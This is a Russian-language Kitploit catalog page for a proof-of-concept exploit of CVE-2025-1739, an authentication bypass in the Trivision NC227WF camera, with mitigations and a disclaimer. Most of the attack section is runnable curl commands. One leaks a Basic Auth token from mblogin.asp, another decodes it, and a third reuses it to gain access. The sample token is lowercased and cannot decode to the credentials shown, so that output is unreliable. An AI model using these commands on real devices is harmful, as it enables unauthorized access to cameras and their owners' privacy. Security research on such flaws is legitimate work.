Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1739 — 0day PoC для CVE-2025-1739 | Kitploit
Инструменты/GitHubGitHub/n0n4m3x41/cve-2025-1739
Аутентификация и авторизацияБезопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC для CVE-2025-1739

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-1738 и CVE-2025-1739 — PoC для камеры Trivision NC227WF

📋 Обзор

CVECVSS v3.1БаллCWEТип
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Обход аутентификации через утечку Basic Auth

🔓 CVE-2025-1739 — Утечка кода Basic Auth / Обход аутентификации (CWE-288)

Описание

Камера передает валидный токен Basic Authentication в кодировке Base64 через эндпоинт mblogin.asp. Этот токен можно тривиально декодировать и повторно использовать для получения несанкционированного доступа к устройству — знание пароля не требуется.

  • Вектор атаки: Смежная сеть (AV:A)
  • CVSS Score: 7.1
  • CWE: CWE-288 (Обход аутентификации с использованием альтернативного пути или канала)

Полезная нагрузка

root@kitploit:~
curl -u admin:whatever http://<IP_КАМЕРЫ>:<ПОРТ> --request-target en/mobile/mblogin.asp
image

Пример ответа

Ответ содержит валидный токен Basic Auth:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

Декодирование токена

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Вывод: admin:unguessable123!

Повторное использование токена

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<IP_КАМЕРЫ>:<ПОРТ>/

🛡️ Меры защиты

  • Обновите прошивку, если доступна исправленная версия от Trivision.
  • Изолируйте камеру в отдельной VLAN без внешнего доступа.
  • Заблокируйте порт управления камеры на межсетевом экране от недоверенных сегментов сети.
  • Измените стандартные учетные данные и регулярно меняйте пароли.
  • Отслеживайте неожиданные обращения к activex_pal.asp и mblogin.asp.

⚖️ Отказ от ответственности

Этот репозиторий предназначен только для образовательных и авторизованных исследований в области безопасности. Авторы не несут ответственности за любое неправомерное использование. Всегда получайте явное разрешение перед тестированием любого устройства.

Скачать инструмент